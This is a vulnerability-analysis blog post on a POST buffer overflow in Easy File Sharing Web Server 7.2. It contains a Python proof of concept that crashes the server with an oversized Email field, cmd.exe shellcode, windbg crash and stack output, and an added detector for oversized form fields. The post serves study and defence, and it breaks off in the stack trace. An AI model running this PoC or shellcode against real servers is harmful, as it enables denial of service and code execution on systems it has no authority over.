Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow Vulnerability Analysis

Introduction

Seeing this software again: wasn't there already a GET request buffer overflow in it?
(My analysis of that one: http://blog.csdn.net/u012763794/article/details/66970749)

This time there is a POST one, so let's see whether there is anything new in it!

Reference: https://www.exploit-db.com/exploits/42165/

Test environment

WinXP SP3 Chinese edition
EFS Web Server 7.2
windbg
IDA
mona
python 2.7

Vulnerability analysis

Modify the exp into a PoC:

import httplib  # Python 2 HTTP client (the environment above is Python 2.7)

server = "127.0.0.1"

# Shellcode: open cmd.exe (carried over from the original exp; this PoC never sends it)
shellcode = (
"\x8b\xec\x55\x8b\xec"
"\x68\x65\x78\x65\x2F"
"\x68\x63\x6d\x64\x2e"
"\x8d\x45\xf8\x50\xb8"
"\xc7\x93\xc2\x77"
"\xff\xd0")

# Overlong Email parameter: 5000 'A' (0x41) bytes, enough to trigger the overflow
payload = "A" * 5000

# Server address and port
httpServ = httplib.HTTPConnection(server, 80)
httpServ.connect()

# POST the oversized form body to /sendemail.ghp (httplib adds Content-Length itself)
httpServ.request('POST', '/sendemail.ghp',
                 'Email=%s&getPassword=Get+Password' % payload)

response = httpServ.getresponse()

httpServ.close()

First, reproduce it:

0:005> g
(1110.1290): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000001 ecx=ffffffff edx=020561b8 esi=02056198 edi=020561b8
eip=61c277f6 esp=02056114 ebp=0205612c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll - 
sqlite3!sqlite3_errcode+0x8e:
61c277f6 81784c97a629a0  cmp     dword ptr [eax+4Ch],0A029A697h ds:0023:4141418d=????????

At a glance it is the same location as last time: sqlite3!sqlite3_errcode+0x8e, with eax=41414141 showing that the overlong input has overwritten the pointer being dereferenced.
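From the defender's side, the request that produces this crash has a recognisable shape: a POST to /sendemail.ghp whose Email field is thousands of bytes of one repeated character. The following Python 3 example, added here and not part of the original post, parses raw HTTP requests and flags form fields that exceed a sane length; the two sample requests are constructed, and MAX_FIELD_LEN is an assumed threshold for an e-mail address field.

```python
from urllib.parse import parse_qs

# Constructed sample requests (not captured traffic). The second mirrors the
# shape of the PoC above: an Email field of 5000 'A's POSTed to /sendemail.ghp.
BENIGN_REQUEST = (
    b"POST /sendemail.ghp HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"Email=user%40example.com&getPassword=Get+Password"
)
OVERFLOW_REQUEST = (
    b"POST /sendemail.ghp HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"Email=" + b"A" * 5000 + b"&getPassword=Get+Password"
)

MAX_FIELD_LEN = 256  # assumed upper bound for a legitimate e-mail address field


def parse_form_post(raw):
    """Split a raw HTTP request into (method, path, decoded form fields)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    method, path, _version = request_line.split(" ", 2)
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return method, path, fields


def longest_run_ratio(value):
    """Fraction of the value covered by its longest run of one repeated character."""
    best = run = 0
    for i, ch in enumerate(value):
        run = run + 1 if i and value[i - 1] == ch else 1
        best = max(best, run)
    return best / len(value) if value else 0.0


def find_oversized_fields(raw, max_len=MAX_FIELD_LEN):
    """Return alerts for POST form fields longer than max_len.

    Each alert is (path, field, length, filler); filler is True when the value
    is dominated by one repeated byte, as in the crash above (eax=41414141).
    """
    method, path, fields = parse_form_post(raw)
    if method != "POST":
        return []
    alerts = []
    for name, values in fields.items():
        for value in values:
            if len(value) > max_len:
                alerts.append((path, name, len(value), longest_run_ratio(value) > 0.9))
    return alerts
```

The same check can be applied to proxy or web-server logs that retain POST bodies, or used as a request filter in front of the vulnerable server until it is patched.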

Now look at the stack:

0:005> kv
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0205612c 61c6286c 000013ad 00001388 01568ea4 sqlite3!sqlite3_errcode+0x8e
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.ex